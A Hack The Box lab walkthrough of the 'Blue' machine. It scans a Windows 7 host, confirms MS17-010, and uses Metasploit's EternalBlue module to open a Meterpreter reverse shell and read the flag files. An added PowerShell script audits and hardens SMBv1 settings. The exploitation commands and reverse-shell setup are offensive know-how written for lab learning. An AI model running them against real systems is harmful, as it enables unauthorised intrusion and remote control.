hack the box ~The Road to Becoming a Wizard~ (Part 22) [Walkthrough] Blue


Introduction

This is the diary of an engineer working toward becoming a wizard in order to survive in the world to come.

~The Road to Becoming a Wizard (Wizard-Class Hacker)~ A Beginner Engineer's Progress Diary
Among hackers, the especially skilled, advanced ones are called wizard-class hackers. The name comes from "wizard" in the sense of someone who can control computers at will. This series records the path of a beginner on the way to becoming such a wizard.

What this post covers

We tackle the last machine in the Hack The Box Beginner Track.

Information gathering

As usual, we start with Nmap.

┌──(maki㉿kali)-[~]
└─$ sudo nmap 10.10.10.40
[sudo] password for maki: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:08 JST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

Several suspicious ports came up, so we scan them in more detail.

┌──(maki㉿kali)-[~]
└─$ sudo nmap 10.10.10.40 -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:13 JST
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/9%OT=135%CT=1%CU=36073%PV=Y%DS=2%DC=T%G=Y%TM=631AAFA
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=2%ISR=103%TI=I%CI=I%II=I%SS=S%TS=7
OS:)OPS(O1=M539NW8ST11%O2=M539NW8ST11%O3=M539NW8NNT11%O4=M539NW8ST11%O5=M53
OS:9NW8ST11%O6=M539ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=80%W=2000%O=M539NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-09-09T03:13:31
|_  start_date: 2022-09-08T21:03:51
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-09T04:13:30+01:00
|_clock-skew: mean: -21m11s, deviation: 34m36s, median: -1m13s

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   264.67 ms 10.10.14.1
2   273.31 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.04 seconds

┌──(maki㉿kali)-[~]
└─$ 

Now we check whether any of these services have known vulnerabilities.

┌──(maki㉿kali)-[~]
└─$ nmap -Pn -script smb-vuln* -p 445 10.10.10.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:20 JST
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 15.58 seconds

We found something suspicious.

This is the vulnerability known as "EternalBlue".

EternalBlue

EternalBlue, also referred to by the bulletin number MS17-010, is an exploit.

It targets a remote code execution vulnerability in SMB (Server Message Block), a communication protocol used by servers.
By abusing EternalBlue, an attacker can remotely take control of a system that uses SMB, with system privileges.
Because it works remotely and requires no user interaction, an attacker who gains control of the target with system privileges can move freely within the LAN (local network), which means they can spread malware.
This is why ransomware was able to spread to every vulnerable Windows OS and to any system that had not applied the EternalBlue security patch.
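The Nmap host script results above reported three things a defender would want to verify on the Windows host itself: SMBv1 is reachable, message signing is not required, and MS17-010 is unpatched. The script below is an added example (not part of the original post) that audits those same settings locally and, with -Fix, applies the registry hardening; it assumes it runs as Administrator in PowerShell 2.0 or later (Windows 7 SP1 ships 2.0), and the srv.sys baseline version is the Windows 7 SP1 value from the MS17-010 file-information table and must be checked against the bulletin for other OS versions.

```powershell
# Added example, not from the original post: local audit of the SMB findings
# reported by the Nmap scan (SMBv1 enabled, signing not required, MS17-010
# missing), with optional hardening. Run as Administrator.
param(
    [switch]$Fix,   # without -Fix the script only reports
    # Assumption: srv.sys version shipped by MS17-010 for Windows 7 SP1.
    # Verify against the MS17-010 bulletin's file table for other OS versions.
    [version]$PatchedSrvVersion = [version]'6.1.7601.23689'
)

$params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-SmbServerState {
    $p = Get-ItemProperty -Path $params
    # An absent SMB1 value means SMBv1 is enabled (the Windows 7 default).
    $smb1Enabled = ($p.SMB1 -eq $null) -or ($p.SMB1 -ne 0)
    # RequireSecuritySignature = 1 makes the server reject unsigned sessions;
    # the scan's "message_signing: disabled" corresponds to 0 or absent.
    $signingRequired = ($p.RequireSecuritySignature -eq 1)

    # srv.sys is the SMBv1 server driver that MS17-010 replaced.
    $vi = (Get-Item "$env:SystemRoot\System32\drivers\srv.sys").VersionInfo
    $srvVersion = [version]('{0}.{1}.{2}.{3}' -f $vi.FileMajorPart,
        $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)

    New-Object PSObject -Property @{
        Smb1Enabled     = $smb1Enabled
        SigningRequired = $signingRequired
        SrvSysVersion   = $srvVersion
        Ms17010Patched  = ($srvVersion -ge $PatchedSrvVersion)
    }
}

$state = Get-SmbServerState
$state | Format-List

if ($state.Smb1Enabled -and -not $state.Ms17010Patched) {
    Write-Warning 'SMBv1 enabled and srv.sys predates MS17-010: exposed to EternalBlue (CVE-2017-0143).'
}
if (-not $state.SigningRequired) {
    Write-Warning 'SMB signing is not required: matches the scan result "message_signing: disabled".'
}

if ($Fix) {
    # Disable the SMBv1 server via the LanmanServer registry switch and
    # require signed SMB sessions. A reboot is needed before this takes effect.
    Set-ItemProperty -Path $params -Name SMB1 -Type DWord -Value 0
    Set-ItemProperty -Path $params -Name RequireSecuritySignature -Type DWord -Value 1
    Set-ItemProperty -Path $params -Name EnableSecuritySignature  -Type DWord -Value 1
    Write-Output 'SMBv1 disabled and signing required; reboot to apply. Install the MS17-010 update separately via Windows Update.'
}
```

Disabling SMBv1 and requiring signing removes the attack surface the scan flagged, but only the MS17-010 update fixes the kernel bug itself, so the srv.sys check should be green before the host is considered safe.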

Preparing the attack

Starting msfconsole


┌──(maki㉿kali)-[~]
└─$ msfconsole

                 _---------.                                                                                                                   
             .' #######   ;."                                                                                                                  
  .---,.    ;@             @@`;   .---,..                                                                                                      
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                                                                                     
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                                                                                     
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                                                                                                     
     "--'.@@@  -.@        @ ,'-   .'--"                                                                                                        
          ".@' ; @       @ `.  ;'                                                                                                              
            |@@@@ @@@     @    .                                                                                                               
             ' @@@ @@   @@    ,                                                                                                                
              `.@@@@    @@   .                                                                                                                 
                ',@@     @   ;           _____________                                                                                         
                 (   3 C    )     /|___ / Metasploit! \                                                                                        
                 ;@'. __*__,."    \|--- \_____________/                                                                                        
                  '(.,...."/                                                                                                                   

       =[ metasploit v6.1.39-dev                          ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command

msf6 > 

Searching for the module

Let's search for EternalBlue by its other name, MS17-010.

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Selecting the module

Going by the Description column, we select number 0.

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

Checking the required options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.155    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Setting the options

We set the target's IP address and the IP address of our own machine.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8
lhost => 10.10.14.8

Verifying the options

Let's check that the settings were applied correctly.

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.10.40      yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Attack

Now we run the attack.

If you cannot receive a reverse shell with this procedure, take a look at the following post.

hack the box ~The Road to Becoming a Wizard~ (Part 21) How to receive a reverse shell in VirtualBox
When I attacked using a reverse shell, I could receive it on my local laptop but not in VirtualBox. This post resolves that.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.10.40:445       - Rex::ConnectionTimeout: The connection with (10.10.10.40:445) timed out.
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.10.40:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158 ) at 2022-09-09 14:37:05 +0900
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Searching for the flag files

From here we go looking for the two flag files.
They are usually placed on the Desktop, so look there first.

User flag

meterpreter > ls
Listing: C:\Windows\system32
============================

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
040777/rwxrwxrwx  0          dir   2011-04-12 16:45:18 +0900  0409
100666/rw-rw-rw-  25072      fil   2022-09-09 14:35:04 +0900  7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[...listing truncated...]

meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2017-07-21 15:56:27 +0900  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2022-02-19 00:11:31 +0900  Config.Msi
040777/rwxrwxrwx  0      dir   2009-07-14 14:08:56 +0900  Documents and Settings
040777/rwxrwxrwx  0      dir   2009-07-14 12:20:08 +0900  PerfLogs
040555/r-xr-xr-x  4096   dir   2022-02-19 00:02:50 +0900  Program Files
040555/r-xr-xr-x  4096   dir   2017-07-15 01:58:41 +0900  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2017-12-24 11:23:01 +0900  ProgramData
040777/rwxrwxrwx  0      dir   2022-02-18 23:09:14 +0900  Recovery
040777/rwxrwxrwx  0      dir   2017-07-14 22:48:44 +0900  Share
040777/rwxrwxrwx  4096   dir   2022-02-19 00:02:22 +0900  System Volume Information
040555/r-xr-xr-x  4096   dir   2017-07-21 15:56:23 +0900  Users
040777/rwxrwxrwx  16384  dir   2022-02-19 00:32:41 +0900  Windows
000000/---------  0      fif   1970-01-01 09:00:00 +0900  pagefile.sys

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2017-07-21 15:56:36 +0900  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 16:07:31 +0900  Default
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 16:51:29 +0900  Public
100666/rw-rw-rw-  174   fil   2009-07-14 13:54:24 +0900  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 22:45:53 +0900  haris

meterpreter > cd haris
meterpreter > ls
Listing: C:\Users\haris
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:23:23 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-15 16:58:33 +0900  Documents
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2021-01-15 18:41:00 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-02-19 00:02:40 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-14 22:45:36 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-14 22:45:37 +0900  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\haris\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-07-15 16:58:32 +0900  desktop.ini
100444/r--r--r--  34    fil   2022-09-09 14:33:22 +0900  user.txt

meterpreter > cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Root flag

meterpreter > cd ..
meterpreter > ls
Listing: C:\Users\haris
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:23:23 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-15 16:58:33 +0900  Documents
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2021-01-15 18:41:00 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-02-19 00:02:40 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-14 22:45:36 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-14 22:45:37 +0900  ntuser.ini

meterpreter > cd ..
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2017-07-21 15:56:36 +0900  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 16:07:31 +0900  Default
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 16:51:29 +0900  Public
100666/rw-rw-rw-  174   fil   2009-07-14 13:54:24 +0900  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 22:45:53 +0900  haris

meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:22:48 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-21 15:56:40 +0900  Documents
040555/r-xr-xr-x  0       dir   2022-02-19 00:21:10 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:42 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2022-09-09 14:33:28 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-09-09 14:33:28 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-21 15:56:24 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-21 15:56:24 +0900  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-07-21 15:56:40 +0900  desktop.ini
100444/r--r--r--  34    fil   2022-09-09 14:33:22 +0900  root.txt

meterpreter > cat root.txt
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
meterpreter > 

Conclusion

I ran into trouble with a VirtualBox setting that prevented me from receiving the reverse shell, but I managed to clear the machine.

With this I have completed the Beginner Track.
It was harder than I imagined, but the sense of achievement is incredible.

I will keep pushing forward.
